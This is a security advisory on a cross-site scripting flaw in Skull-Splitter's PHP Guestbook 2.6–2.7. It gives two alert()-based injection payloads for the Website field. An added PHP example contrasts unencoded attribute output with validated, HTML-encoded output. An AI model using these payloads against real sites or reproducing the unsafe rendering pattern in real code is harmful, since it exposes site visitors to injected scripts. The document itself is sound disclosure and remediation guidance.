XSS Vulnerability in Skull-Splitter PHP Guestbook
- Last Update: 2006.03.27 Exploitation code published
- Risk Level: Cross Site Scripting
- Vulnerable Software: Skull-Splitter's PHP Guestbook (http://www.boysen.be/) 2.6, 2.7
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
A cross-site scripting vulnerability was found in the Skull-Splitter's PHP Guestbook (http://www.boysen.be/) script.
Vulnerable Script: guestbook.php
Condition: magic_quotes_gpc = off
PoC/Exploit
Cross-Site Scripting Example:
Website: aaa"><script>alert("Vulnerable")</script><aaa a="
Website: http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com
Solution
To fix this problem, install or upgrade to version 2.75 provided by the vendor.
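The following is an added illustration, not code from guestbook.php or from the vendor's 2.75 release (this advisory shows neither): it contrasts an unencoded Website field with a validated and encoded one, using the Website values above as input. The function names and the `<a href>` output template are assumptions.

```php
<?php
// Added example: hypothetical rendering of the guestbook "Website" field.
// render_website_unsafe() / render_website_safe() are illustrative names,
// not functions from Skull-Splitter's guestbook.php.

// Vulnerable pattern: the submitted value lands in an attribute unencoded,
// so a double quote in the input ends the attribute and the rest is parsed
// as markup.
function render_website_unsafe(string $website): string
{
    return '<a href="' . $website . '">Website</a>';
}

// Hardened pattern: validate the URL, then encode for the attribute context.
function render_website_safe(string $website): string
{
    $website = trim($website);
    $scheme  = strtolower((string) parse_url($website, PHP_URL_SCHEME));

    // Accept only absolute http/https URLs; anything else is not rendered.
    if (filter_var($website, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        return '';
    }

    // ENT_QUOTES encodes both quote styles, so the value stays inside href="".
    $encoded = htmlspecialchars($website, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $encoded . '" rel="nofollow noopener">Website</a>';
}

// Inputs: the two Website values from this advisory plus one constructed
// benign URL (www.example.com is a placeholder).
$samples = [
    'aaa"><script>alert("Vulnerable")</script><aaa a="',
    'http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com',
    'http://www.example.com/guestbook?id=1&lang=en',
];

foreach ($samples as $s) {
    echo "input : $s\n";
    echo "unsafe: " . render_website_unsafe($s) . "\n";
    echo "safe  : " . var_export(render_website_safe($s), true) . "\n\n";
}
```

Note that magic_quotes_gpc only prefixes quotes with a backslash, which is not HTML encoding, and the setting was removed in PHP 5.4. Encoding at output is the control to rely on, regardless of that setting.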